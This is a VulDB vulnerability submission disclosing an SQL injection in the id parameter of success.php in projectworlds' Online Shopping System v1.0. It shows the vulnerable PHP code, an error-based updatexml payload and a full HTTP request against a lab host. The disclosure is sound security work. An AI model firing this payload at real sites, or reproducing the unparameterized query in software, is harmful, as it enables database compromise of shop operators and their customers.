| 标题 | projectworlds Free Download Online Shopping System v1.0 SQL Injection |
|---|
| 描述 | # SQL Injection vulnerability was discovered in Free Download Online Shopping System(success.php)
Official Website: https://projectworlds.in/free-projects/php-projects/free-download-online-shopping-system/
Version: 1.0 Related Code file: /online-shopping-webvsite-in-php-master/success.php
dbname=store
Payload: /online-shopping-webvsite-in-php-master/success.php?id=1 and(select updatexml(1,concat(0x7e,(select database())),1))--+
<hr>
```php
<?php
session_start();
require 'connection.php';
if(!isset($_SESSION['email'])){
header('location:index.php');
}else{
$user_id=$_GET['id'];
$confirm_query="update users_items set status='Confirmed' where user_id=$user_id";
$confirm_query_result=mysqli_query($con,$confirm_query) or die(mysqli_error($con));
}
?>
```
The id variable is directly inserted into the SQL query without any escaping or parameterization. An attacker could inject malicious SQL code by manipulating the id field. in (line number 1-12 of )
Injection parameter: id
```
GET /online-shopping-webvsite-in-php-master/success.php?id=1%20and(select%20updatexml(1,concat(0x7e,(select%20database())),1))--+ HTTP/1.1
Host: 192.168.1.88
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=jv9bat9nq7anb7bgkppu8kp2oc
Connection: close
```
 |
|---|
| 来源 | ⚠️ https://github.com/Sy0ung-cmd/Cve-report/blob/main/SQLi-1.md |
|---|
| 用户 | SunYihang (UID 77239) |
|---|
| 提交 | 2024-11-09 12時41分 (1 年前) |
|---|
| 管理 | 2024-11-10 09時32分 (21 hours later) |
|---|
| 状态 | 已接受 |
|---|
| VulDB条目 | 283805 [Project Worlds Free Download Online Shopping System 直到 192.168.1.88 success.php 标识符 SQL注入] |
|---|
| 积分 | 20 |
|---|